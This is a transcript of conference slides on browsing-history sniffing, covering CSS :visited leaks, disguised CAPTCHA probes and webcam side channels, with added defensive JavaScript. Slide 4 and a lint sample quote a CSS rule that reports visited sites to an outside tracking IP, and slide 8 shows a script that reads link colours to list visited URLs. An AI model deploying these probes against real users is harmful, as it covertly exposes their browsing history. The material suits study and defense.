
Slide 1: I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history
Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson (Carnegie Mellon University)
IEEE Symposium on Security and Privacy, May 2011

Slide 2: (image only; no transcript text)

Slide 3: Outline
- Introduction
- Automated Attacks
- Exp 1: Interactive Attacks
- Exp 2: Side-Channel Attacks
- Related Work
- Conclusion

Slide 4: Introduction
History sniffing through CSS :visited (Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271)
In HTML, a link with id link1 whose text is: Visit Google!
In CSS:
    #link1:visited {
      color: red;
      background: url(http://140.115.53.28/track.php?url=google.com);
    }

Slide 5: Introduction
L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy
- Make getComputedStyle act as though all links are unvisited
- Make certain CSS selectors act as though links are always unvisited
- Limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke
The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense; it is still vulnerable to interactive attacks.
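The property restriction on this slide is the part of Baron's defense that a site author can reason about from a stylesheet alone. The following checker is an added example, not code from the slides or from Baron's browser patch: it parses flat "selector { declarations }" rules and reports every declaration in a :visited rule that uses a property outside the allowed list, which is exactly the set of declarations a patched browser ignores (and an unpatched one would have applied). The parser, the function names and the sample stylesheets are assumptions constructed for this example; only the allowed-property list and Clover's 2002 rule come from the slides.

```javascript
// Added example, not code from the slides or from Baron's browser patch: a
// stylesheet lint that applies the property restriction of Baron's :visited
// defense. It parses flat "selector { declarations }" rules (no nesting, no
// comments) and reports every declaration in a :visited rule that uses a
// property outside the allowed list from the slide. Sample stylesheets are
// constructed for this example.

// Properties a :visited rule may still change under Baron's defense.
const VISITED_ALLOWED = new Set([
  'color', 'background-color', 'outline-color', 'column-rule-color',
  'fill', 'stroke',
]);

// border-*-color is allowed as a family: border-top-color, border-left-color, ...
function isAllowedVisitedProperty(prop) {
  const p = prop.trim().toLowerCase();
  return VISITED_ALLOWED.has(p) || /^border-(top|right|bottom|left)-color$/.test(p);
}

// Split a flat stylesheet into { selector, decls: [{ prop, value }] } records.
function parseRules(css) {
  const rules = [];
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const decls = m[2]
      .split(';')
      .map((d) => d.trim())
      .filter((d) => d.includes(':'))
      .map((d) => {
        const i = d.indexOf(':');
        return { prop: d.slice(0, i).trim(), value: d.slice(i + 1).trim() };
      });
    rules.push({ selector: m[1].trim(), decls });
  }
  return rules;
}

// Return the declarations the defense would ignore: in a pre-2010 browser
// each of them could leak visited state through layout or resource loads.
function findVisitedLeaks(css) {
  const findings = [];
  for (const rule of parseRules(css)) {
    if (!/:visited\b/.test(rule.selector)) continue;
    for (const { prop, value } of rule.decls) {
      if (!isAllowedVisitedProperty(prop)) {
        findings.push({ selector: rule.selector, prop, value });
      }
    }
  }
  return findings;
}

// Constructed samples: Clover's 2002 rule from the slide, a rule that stays
// within the allowed list, and a layout-changing rule (indirect sniffing).
const CLOVER_2002_CSS = `
  #link1:visited { color: red; background: url(http://140.115.53.28/track.php?url=google.com); }
`;
const COMPLIANT_CSS = `
  a:visited { color: red; border-bottom-color: red; }
  a:hover { font-weight: bold; }
`;
const LAYOUT_CSS = `
  a:visited { font-size: 20px; color: red; }
`;

console.log(findVisitedLeaks(CLOVER_2002_CSS)); // the background declaration is flagged
console.log(findVisitedLeaks(COMPLIANT_CSS));   // []
console.log(findVisitedLeaks(LAYOUT_CSS));      // the font-size declaration is flagged
```

Running this over Clover's rule flags only the background declaration; the color change survives, which is why the slides that follow can still build interactive attacks on color alone. A lint like this does not replace the browser-side enforcement (the browser, not the site, is the trust boundary), but it shows a site author which of their own :visited rules a modern browser will silently drop.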

Slide 6: Introduction
Dongseok Jang et al., "An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications"
- Small sets of links (6 to 220) probed by real exploiters
- 46 popular websites, including one from the Alexa Top 100
- This makes interactive attacks possible: an attacker only needs to probe a small set of URLs

Slide 7: Introduction
What can history sniffers do?
Benign:
- Websites could use history sniffing to determine whether their users have visited known phishing sites.
- Websites could seed visitors' history with URLs made up for the purpose, and use those URLs to re-identify their visitors (much like cookies).
Malicious:
- Track visitors across sites for advertising purposes, determining whether they also visit a site's competitors.
- Construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit.

Slide 8: Automated Attacks
Direct sniffing
    a:visited { color: red; }

    // Pre-2010 technique: read the computed color of a link for each probed URL.
    // Under Baron's defense getComputedStyle reports the unvisited color for
    // every link, so visited_array stays empty.
    var url_array = new Array('http://a.com', 'http://b.com');
    var visited_array = new Array();
    var link_el = document.createElement('a');
    var computed_style = document.defaultView.getComputedStyle(link_el, "");
    for (var i = 0; i < url_array.length; i++) {
      link_el.href = url_array[i];
      if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
        visited_array.push(url_array[i]);
      }
    }

Slide 9: Automated Attacks
Indirect sniffing
- Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
- Make visited and unvisited links cause different images to load (background-image used in a :visited rule).
- Does not require JavaScript

Slide 10: Automated Attacks
Side-channel sniffing
- Timing attacks: the attacker can make the page take longer to lay out if a link is visited than if it is unvisited
  - Transparent underline
  - Any other style rule in :visited
Defense
- Baron's solution does well against all 3 types above (direct, indirect, side-channel)

Slide 11: Exp 1: Interactive Attacks
Requires victims to interact with malicious sites
- The authors claim that interactive attacks can be disguised as "normal" interactive tasks that users will not find surprising or suspicious
Amazon's Mechanical Turk
- Recruited 307 participants
All tasks in this experiment operate within the constraints of Baron's defense
- Visited-link styles only change the color on the screen
- The tasks pretend to be CAPTCHA tests
  - CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

Slide 12: Exp 1: Interactive Attacks
1. Word CAPTCHA
- Each word is a hyperlink to a URL that the attacker wishes to probe
- If unvisited, it is drawn in the same color as the background.

Slide 13: Exp 1: Interactive Attacks
2. Character CAPTCHA
- Seven-segment LCD symbols
- Every letter represents 3 URLs
- Site-supplied font

Slide 14: Exp 1: Interactive Attacks
- 4 + 5 = 9; 4 + F = A; 5 + F = 6; 4 + 5 + F = 8
- "-" is always on
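Slides 13 and 14 describe the character CAPTCHA only by its sums, so it helps to check that the scheme really is a 3-bit code: the always-on middle bar plus any subset of the digits 4, 5 and F must give 8 distinct glyphs. The following is an added example, not code from the slides or the paper. It uses the standard seven-segment labelling (a=top, b=upper right, c=lower right, d=bottom, e=lower left, f=upper left, g=middle) and a standard digit-to-segment table; the slot order 4, 5, F follows the slide, while the function and constant names are assumptions made here.

```javascript
// Added example, not from the slides or the paper: a check that the
// character-CAPTCHA encoding on the slide is unambiguous. Each glyph is the
// middle segment "-" (always on) plus the segments of the digits 4, 5 and F
// for whichever of the three probed URLs is visited, so the 2^3 = 8 subsets
// must map to 8 distinct seven-segment glyphs. The digit-to-segment table is
// standard seven-segment data, not something taken from the slide.

// Segment sets, each written in sorted order so they can be compared as keys.
const SEGMENTS = {
  '-': 'g',
  '4': 'bcfg',
  '5': 'acdfg',
  '6': 'acdefg',
  '8': 'abcdefg',
  '9': 'abcdfg',
  'A': 'abcefg',
  'F': 'aefg',
};

// One base digit per URL slot, in the order the slide lists them.
const SLOT_DIGITS = ['4', '5', 'F'];

// Glyph shown for a given visited pattern, e.g. [true, false, true] means the
// first and third URL are visited. Returns null if the union is not a glyph.
function glyphFor(visited) {
  const segs = new Set(SEGMENTS['-']);
  visited.forEach((isVisited, slot) => {
    if (isVisited) for (const s of SEGMENTS[SLOT_DIGITS[slot]]) segs.add(s);
  });
  const key = [...segs].sort().join('');
  const hit = Object.entries(SEGMENTS).find(([, s]) => s === key);
  return hit ? hit[0] : null;
}

// Enumerate all 8 visited patterns and their glyphs.
function allGlyphs() {
  const table = [];
  for (let mask = 0; mask < 8; mask++) {
    const visited = SLOT_DIGITS.map((_, slot) => Boolean(mask & (1 << slot)));
    table.push({ visited, glyph: glyphFor(visited) });
  }
  return table;
}

// The scheme carries 3 bits per character only if every pattern yields a
// different, defined glyph.
function encodingIsUnambiguous() {
  const glyphs = allGlyphs().map((row) => row.glyph);
  return glyphs.every((g) => g !== null) && new Set(glyphs).size === 8;
}

console.log(allGlyphs()); // glyphs in mask order: '-', '4', '5', '9', 'F', 'A', '6', '8'
```

The four sums on the slide fall out of the segment unions (4 and 5 together light a, b, c, d, f, g, which is a 9), and the enumeration confirms that no two of the eight patterns collide, which is what lets one typed character carry the visited state of three URLs. From a defender's view this is the point of the slide: with Baron's defense in place the only channel left is the color the user sees, and a well-chosen font turns that single bit per link into a glyph the user transcribes without noticing anything unusual.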

Slide 15: Exp 1: Interactive Attacks
3. Chessboard puzzle
- Each square contains a URL
- Only the pawns corresponding to visited sites are made visible
- Uses SVG or text to control the pawns

Slide 16: Exp 1: Interactive Attacks
4. Pattern matching puzzle

Slide 17: Exp 1: Interactive Attacks
Randomly generated task instances corresponding to known proportions of visited and unvisited links.

Slide 18: Exp 1: Interactive Attacks
Automated history-sniffing exploits were run on all the participants
- URL set from wtikay.com
- 7012 commonly visited URLs (from the Alexa Top 5000)

Slides 19 to 23: Exp 1: Interactive Attacks (result figures only; no transcript text)

Slide 24: Exp 2: Side-channel Attacks
Webcam attacks
- Random 20 URLs with 10 visited ones
- Variant 1: designed to comply with the WCAG standard for seizure safety
- Variant 2: make the entire browser window flash, in a brighter color

Slide 25: Exp 2: Side-channel Attacks
Author test
- 100% accuracy for both variants under all tested conditions:
  - Well-lit room
  - Person stays still in front of the computer
- In a dark room, accuracy dropped to 50%
Field test
- 60 of the 307 participants

Slide 26: Exp 2: Side-channel Attacks
Field test (figure only; no transcript text)

Slide 27: Exp 2: Side-channel Attacks
In real life:
- ChatRoulette service
- The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor

Slide 28: Related Work
Page cache
- Felten et al., Timing Attacks on Web Privacy
DNS cache
- Felten et al., Timing Attacks on Web Privacy
Both tactics above
- Work only the first time
- Short-term history only
Resources loadable cross-origin but only available to logged-in users
- Facebook, Gmail, Twitter, etc.
- JavaScript onerror event

Slide 29: Related Work
Cookies, Flash Player local shared objects
Ad-blockers, private browsing mode

Slide 30: Conclusion
- Automated history sniffing attacks have been successfully blocked by Baron's solution
- Interactive attacks have not
- This paper developed proofs of concept for 6 history-sniffing exploits against Baron's defense
  - 4 interactive attacks
  - 2 webcam-based detections of the screen

